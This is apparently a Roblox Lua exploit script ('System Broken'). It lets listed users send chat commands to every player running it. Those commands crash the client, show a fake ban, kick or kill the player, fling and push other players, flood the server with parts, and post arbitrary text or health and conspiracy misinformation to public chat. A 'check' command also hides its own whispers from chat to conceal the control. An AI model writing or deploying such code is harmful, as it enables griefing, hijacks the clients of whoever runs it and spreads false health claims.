local players = game:GetService("Players") local plr = players.LocalPlayer local OnBenx = false local OnBunny = false local prefix = "/" local Flinging = false local PushTool = nil --Tier 1 List local BrokenVip = {} local BrokenPremium = {} local BrokenPuppeter = {} local BrokenStaff = {SaBenYigitx} -- ASSETS local milk = { 12480466786; } local jumpscares = { 10755920324, 1119705746, 12213285275, 12293699441, 10727260846, 12342625873, 8804558033; } local memes = { 8373881910, 7279156932, 11648246803, 928967808, 9260491536, 551973081, 8863809025, 11569839895; } local dumbthings = { "If there's inflation, they should just print more bills", "Banks just want to keep our money; it's better to keep everything at home.", "Gravity doesn't exist; the Earth is just accelerating upward and pressing us down.", "Airplanes fly in straight lines because the Earth is flat. If it were curved, they'd have to follow a curve", "Natural immunity is more effective than immunity provided by vaccines.", "The Illuminati secretly control the world and manipulate global events.", "5G causes COVID and other serious illnesses.", "The cure for cancer already exists but is kept secret to keep pharmaceutical companies rich.", } --FUNCTIONS local function GetRoot(player) return player.Character.HumanoidRootPart end local function GetLT(player) return player.Character.LowerTorso end local function GetHum(player) return player.Character.Humanoid end local function GetPing() return (game:GetService("Stats").Network.ServerStatsItem["Data Ping"]:GetValue())/1000 end local function GetPush() local TempPush = nil pcall(function() if plr.Backpack:FindFirstChild("Push") then PushTool = plr.Backpack.Push PushTool.Parent = plr.Character TempPush = PushTool end for i,v in pairs(game.Players:GetPlayers()) do if v.Character:FindFirstChild("Push") then TempPush = v.Character.Push end end end) return TempPush end local function GetPlayer(UserDisplay) if UserDisplay ~= "" then for i,v in pairs(game.Players:GetPlayers()) do if v.Name:lower():match(UserDisplay) or v.DisplayName:lower():match(UserDisplay) then return v end end return nil else return nil end end local function PredictionTP(player,method) local root = GetRoot(player) local pos = root.Position local vel = root.Velocity GetRoot(plr).CFrame = CFrame.new((pos.X)+(vel.X)*(GetPing()*3.5),(pos.Y)+(vel.Y)*(GetPing()*2),(pos.Z)+(vel.Z)*(GetPing()*3.5)) if method == "safe" then task.wait() GetRoot(plr).CFrame = CFrame.new(pos) task.wait() GetRoot(plr).CFrame = CFrame.new((pos.X)+(vel.X)*(GetPing()*3.5),(pos.Y)+(vel.Y)*(GetPing()*2),(pos.Z)+(vel.Z)*(GetPing()*3.5)) end end local function Push(Target) local Push = GetPush() local FixTool = nil if Push ~= nil then local args = {[1] = Target.Character} GetPush().PushTool:FireServer(unpack(args)) end if plr.Character:FindFirstChild("Push") then plr.Character.Push.Parent = plr.Backpack end if plr.Character:FindFirstChild("ModdedPush") then FixTool = plr.Character:FindFirstChild("ModdedPush") FixTool.Parent = plr.Backpack FixTool.Parent = plr.Character end if plr.Character:FindFirstChild("ClickTarget") then FixTool = plr.Character:FindFirstChild("ClickTarget") FixTool.Parent = plr.Backpack FixTool.Parent = plr.Character end if plr.Character:FindFirstChild("potion") then FixTool = plr.Character:FindFirstChild("potion") FixTool.Parent = plr.Backpack FixTool.Parent = plr.Character end end local function ToggleFling(bool) task.spawn(function() if bool then local RVelocity = nil Flinging = true repeat pcall(function() RVelocity = GetRoot(plr).Velocity GetRoot(plr).Velocity = Vector3.new(math.random(-150,150),9000,math.random(-150,150)) game.RunService.RenderStepped:wait() GetRoot(plr).Velocity = RVelocity end) game.RunService.Heartbeat:wait() until Flinging == false else Flinging = false end end) end local function GetPush() local TempPush = nil pcall(function() if plr.Backpack:FindFirstChild("Push") then PushTool = plr.Backpack.Push PushTool.Parent = plr.Character TempPush = PushTool end for i,v in pairs(Players:GetPlayers()) do if v.Character:FindFirstChild("Push") then TempPush = v.Character.Push end end end) return TempPush end local function Arg3(command) local x = "" for i,v in pairs(command) do pcall(function () if i>=2 then x = x.." "..command[i+1] end end) end return x end local function CheckCMD(arg,command) if string.find(arg,prefix..""..command) then return true else return false end end local function GenImage(list) task.spawn(function() local ScreenGui = Instance.new("ScreenGui") local Image = Instance.new("ImageLabel") ScreenGui.Name = "Temp" ScreenGui.IgnoreGuiInset = true ScreenGui.Parent = game.CoreGui Image.Name = "Image" Image.ImageTransparency = 0 Image.BackgroundTransparency = 1 Image.Position = UDim2.new(0,0,0,0) Image.Size = UDim2.new(1,0,1,0) Image.Image = "rbxassetid://"..list[math.random(1,#list)] Image.Parent = ScreenGui task.wait(5) ScreenGui:Destroy() end) end local function ToggleRagdoll(bool) pcall(function() plr.Character:FindFirstChild("Falling down").Disabled = bool plr.Character:FindFirstChild("Swimming").Disabled = bool plr.Character:FindFirstChild("StartRagdoll").Disabled = bool plr.Character:FindFirstChild("Pushed").Disabled = bool plr.Character:FindFirstChild("KillScript").Disabled = bool plr.Character:FindFirstChild("RagdollMe").Disabled = bool end) end local function BenxTP(player,offset) GetRoot(plr).CFrame = GetLT(player).CFrame*CFrame.new(0,0,offset)*CFrame.Angles(-1.5,math.rad(0),0); task.wait() GetRoot(plr).Velocity = Vector3.new(0,0,0) end --[[TIER 1 TEMPLATE if CheckCMD(Split[1],"cmd") then if (not ClientIsVip) or (SpeakerIsPremium) then --SCRIPT end end TIER 2 TEMPLATE if CheckCMD(Split[1],"cmd") then if SpeakerIsPremium then --SCRIPT end end ]] local function ExecuteCommand(Pid,msg) local Speaker = players:GetPlayerByUserId(Pid) local LowerCMD = msg:lower() local Split = string.split(LowerCMD," ") local LowerName, LowerDisplay = string.lower(plr.Name), string.lower(plr.DisplayName) local ClientIsVip = table.find(BrokenVip,plr.UserId) local ClientIsPremium = table.find(BrokenPremium,plr.UserId) local SpeakerIsPremium = table.find(BrokenPremium,Speaker.UserId) local SpeakerIsPuppeteer = table.find(BrokenPuppeter,Speaker.UserId) local SpeakerIsOwner = table.find(BrokenStaff,Speaker.UserId) pcall(function() local Allowed = string.find(LowerDisplay,Split[2]) or string.find(LowerName,Split[2]) if Allowed then --TIER 1 if CheckCMD(Split[1],"bring") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then GetRoot(plr).CFrame = GetRoot(Speaker).CFrame end end if CheckCMD(Split[1],"bunny") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then OnBunny = true repeat task.wait() pcall(function() if GetHum(plr).FloorMaterial ~= Enum.Material.Air then GetHum(plr):ChangeState(3) end end) until OnBunny == false end end if CheckCMD(Split[1],"check") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then local args = {[1] = ("/w "..Speaker.Name.." I'm using System Broken."),[2] = "All"} game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args)) local args = {[1] = ("/leave"),[2] = "To "..Speaker.Name} game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args)) task.wait(GetPing()+0.1) for i,dm in pairs(plr.PlayerGui.Chat.Frame.ChatChannelParentFrame["Frame_MessageLogDisplay"].Scroller:GetChildren()) do if dm:IsA("Frame") and dm:FindFirstChildOfClass("TextLabel") then if string.find(dm:FindFirstChildOfClass("TextLabel").Text,"System") or string.find(dm:FindFirstChildOfClass("TextLabel").Text,"channel") then dm.Visible = false end end end for i,bubble in pairs(game.CoreGui.BubbleChat:GetDescendants()) do if bubble:IsA("TextLabel") then if string.find(bubble.Text,"System") then bubble.Parent.Parent.Visible = false end end end end end if CheckCMD(Split[1],"dumb") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then local args = {[1] = dumbthings[math.random(1, #dumbthings)],[2] = "All"} game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args)) end end if CheckCMD(Split[1],"fling") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then GetRoot(plr).CFrame = CFrame.new(9999999999,9999999999,9999999999) end end if CheckCMD(Split[1],"freeze") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then for i,v in pairs(plr.Character:GetChildren()) do if v:IsA("BasePart") then v.Anchored = true end end end end if CheckCMD(Split[1],"glitch") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then local GlitchPart = Instance.new("Part") GlitchPart.Name = "XD" GlitchPart.Transparency = 1 GlitchPart.Size = Vector3.new(5,5,5) GlitchPart.CanCollide = false GlitchPart.Anchored = false GlitchPart.Parent = GetRoot(plr) local weld = Instance.new("Weld") weld.Parent = GlitchPart weld.Part0 = GetRoot(plr) weld.Part1 = GlitchPart GlitchPart.Position = GetRoot(plr).Position+Vector3.new(25,3,-18) end end if CheckCMD(Split[1],"gravity") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then game.Workspace.Gravity = 196 end end if CheckCMD(Split[1],"jumpscare") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then GenImage(jumpscares) end end if CheckCMD(Split[1],"jump") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then GetHum(plr):ChangeState(3) end end if CheckCMD(Split[1],"meme") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then GenImage(memes) end end if CheckCMD(Split[1],"milk") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then GenImage(milk) end end if CheckCMD(Split[1],"nogravity") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then game.Workspace.Gravity = 1 end end if CheckCMD(Split[1],"ragdoll") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then ToggleRagdoll(false) GetHum(plr):ChangeState(0) end end if CheckCMD(Split[1],"say") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then Message = Arg3(Split) local args = {[1] = Message,[2] = "All"} game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(unpack(args)) end end if CheckCMD(Split[1],"sit") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then GetHum(plr).Sit = true end end if CheckCMD(Split[1],"slow") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then GetHum(plr).WalkSpeed = 5 end end if CheckCMD(Split[1],"spin") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then local bav = Instance.new("BodyAngularVelocity") bav.Parent = GetRoot(plr) bav.Name = "Spin" bav.MaxTorque = Vector3.new(0,math.huge,0) bav.AngularVelocity = Vector3.new(0,30,0) end end if CheckCMD(Split[1],"unfreeze") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then for i,v in pairs(plr.Character:GetChildren()) do if v:IsA("BasePart") then v.Anchored = false end end end end if CheckCMD(Split[1],"unbunny") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then OnBunny = false end end if CheckCMD(Split[1],"unslow") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then GetHum(plr).WalkSpeed = 16 end end if CheckCMD(Split[1],"unspin") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then if GetRoot(plr):FindFirstChild("Spin") then GetRoot(plr).Spin:Destroy() end end end if CheckCMD(Split[1],"yeet") then if (not ClientIsVip) or (SpeakerIsPremium and ((not ClientIsPremium) or SpeakerIsOwner)) then for i = 1,500 do GetRoot(plr).CFrame = GetRoot(plr).CFrame*CFrame.new(0,5,0) GetRoot(plr).Velocity = Vector3.new(0,10,0) task.wait() end end end --TIER 2 if CheckCMD(Split[1],"benx") then if (not ClientIsPremium) or (SpeakerIsOwner) then OnBenx = true ToggleRagdoll(true) repeat task.wait() pcall(function() GetHum(plr).Sit = true BenxTP(Speaker,-1.2); BenxTP(Speaker,-1.4); BenxTP(Speaker,-1.6); BenxTP(Speaker,-1.8); BenxTP(Speaker,-2.0) BenxTP(Speaker,-2.2); BenxTP(Speaker,-2.4); BenxTP(Speaker,-2.6); BenxTP(Speaker,-2.8); BenxTP(Speaker,-3,0); BenxTP(Speaker,-2.8); BenxTP(Speaker,-2.6); BenxTP(Speaker,-2.4); BenxTP(Speaker,-2.2); BenxTP(Speaker,-2.0); BenxTP(Speaker,-1.8); BenxTP(Speaker,-1.6); BenxTP(Speaker,-1.4) end) until OnBenx == false end end if CheckCMD(Split[1],"blind") then if (not ClientIsPremium) or (SpeakerIsOwner) then if game:GetService("Lighting"):FindFirstChild("Blur") then game:GetService("Lighting"):FindFirstChild("Blur"):Destroy() end local Blur = Instance.new("BlurEffect") Blur.Size = 30 Blur.Enabled = true Blur.Parent = game:GetService("Lighting") end end if CheckCMD(Split[1],"bug") then if (not ClientIsPremium) or (SpeakerIsOwner) then plr.Character:Destroy() plr:Destroy() end end if CheckCMD(Split[1],"crash") then if (not ClientIsPremium) or (SpeakerIsOwner) then pcall(function() while true do end end) end end if CheckCMD(Split[1],"explode") then if (not ClientIsPremium) or (SpeakerIsOwner) then ToggleRagdoll(false) GetHum(plr):ChangeState(0) task.wait() local bav = Instance.new("BodyAngularVelocity") bav.Parent = GetRoot(plr) bav.Name = "Spin" bav.MaxTorque = Vector3.new(0,math.huge,0) bav.AngularVelocity = Vector3.new(0,150,0) end end if CheckCMD(Split[1],"fakeban") then if (not ClientIsPremium) or (SpeakerIsOwner) then pcall(function() plr:Kick("You were permanently banned for using exploits.") end) task.wait(0.1) while true do end end end if CheckCMD(Split[1],"kick") then if (not ClientIsPremium) or (SpeakerIsOwner) then KickMessage = Arg3(Split) plr:Kick("Kicked by"..Speaker.Name..". Reason: "..KickMessage) end end if CheckCMD(Split[1],"kill") then if (not ClientIsPremium) or (SpeakerIsOwner) then GetHum(plr):ChangeState(15) end end if CheckCMD(Split[1],"lag") then if (not ClientIsPremium) or (SpeakerIsOwner) then task.spawn(function() local function SpawnBall() local part = Instance.new("Part") part.Shape = Enum.PartType.Ball part.Name = "XD" part.Size = Vector3.new(1,1,1) part.Position = Vector3.new(-61, 300, -228) part.Transparency = 0.5 part.CanCollide = true part.Anchored = false part.Parent = game.Workspace end while task.wait(0.15) do SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); SpawnBall(); end end) end end if CheckCMD(Split[1],"rejoin") then if (not ClientIsPremium) or (SpeakerIsOwner) then game:GetService("TeleportService"):TeleportToPlaceInstance(game.PlaceId, game.JobId, plr) end end if CheckCMD(Split[1],"shield") then if SpeakerIsPremium then _G.shield(Speaker.UserId) end end if CheckCMD(Split[1],"unbenx") then if (not ClientIsPremium) or (SpeakerIsOwner) then OnBenx = false end end if CheckCMD(Split[1],"unblind") then if (not SpeakerIsPremium) or (SpeakerIsOwner) then if game:GetService("Lighting"):FindFirstChild("Blur") then game:GetService("Lighting"):FindFirstChild("Blur"):Destroy() end end end if CheckCMD(Split[1],"virus") then if (not SpeakerIsPremium) or (SpeakerIsOwner) then repeat task.wait(math.random(1,3)) GetHum(plr).Health -= math.random(1,5) until GetHum(plr).Health <= 0 end end --Puppeteer Tier local TargetPlayer = GetPlayer(Split[3]) if CheckCMD(Split[1],"pgoto") then if ((not ClientIsVip and not ClientIsPremium) and (SpeakerIsPuppeteer)) or (SpeakerIsOwner) then GetRoot(plr).CFrame = GetRoot(TargetPlayer).CFrame end end if CheckCMD(Split[1],"pfling") then if ((not ClientIsVip and not ClientIsPremium) and (SpeakerIsPuppeteer)) or (SpeakerIsOwner) then local attempts = 0 local pos = GetRoot(plr).CFrame ToggleFling(true) repeat task.wait() pcall(function() attempts += 1 PredictionTP(TargetPlayer,"safe") end) until attempts >= 30 or Flinging == false GetRoot(plr).CFrame = pos ToggleFling(false) end end if CheckCMD(Split[1],"ppush") then if ((not ClientIsVip and not ClientIsPremium) and (SpeakerIsPuppeteer)) or (SpeakerIsOwner) then local pos = GetRoot(plr).CFrame PredictionTP(TargetPlayer) task.wait(GetPing()+0.1) Push(TargetPlayer) GetRoot(plr).CFrame = pos end end end end) end --Get premiums for i,v in pairs(players:GetPlayers()) do if table.find(BrokenVip,v.UserId) then v.Chatted:Connect(function(command) ExecuteCommand(v.UserId,command) end) end end players.PlayerAdded:Connect(function(v) if table.find(BrokenVip,v.UserId) then v.Chatted:Connect(function(command) ExecuteCommand(v.UserId,command) end) end end)